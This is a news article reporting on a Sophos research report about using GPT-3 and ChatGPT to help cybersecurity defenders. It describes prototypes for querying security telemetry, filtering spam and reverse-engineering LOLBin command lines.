ChatGPT, the AI-based bot developed by OpenAI that gives human-like answers to the questions posed by users, is many things for many people. From coders to students to academics, it’s being used by a cross-section of users, tapping its potential to cull out information from the vast pool of data that it was fed on.
Cybersecurity solutions company Sophos has said that ChatGPT can be used as a co-pilot by organisations to help them face and defeat cyber attackers. It released a research report on how the cybersecurity industry can leverage GPT-3, the language model behind the now well-known ChatGPT framework.
The report — GPT for You and Me: Applying AI Language Processing to Cyber Defenses — shows how GPT-3 was used to simplify the search for malicious activity in datasets and filter spam more accurately.
- Also read: ChatGPT Plus: Know how to subscribe
“We’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different,” said Sean Gallagher, Principal Threat Researcher, Sophos. “The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings.”
GPT-3’s cybersecurity potential
Experts at Sophos have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called ‘few-shot learning’ to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.
The first application was a natural language query interface for sifting through malicious activity in security software telemetry. Sophos tested the model against its endpoint detection and response product.
Sophos also tested a new spam filter using ChatGPT and found that, when compared to other machine learning models for spam filtering, the filter using GPT-3 was significantly more accurate.
Finally, Sophos researchers were able to create a programme to simplify the process of reverse-engineering the command lines of LOLBins (or Living Off the Land Binaries) — executable files that are already present in the user environment. Considered to be non-malicious, LOLBins can be misused by hackers to launch malicious attacks.
Reverse-engineering is notoriously tricky, but also critical for understanding LOLBins’ behaviour and stopping those types of attacks in the future.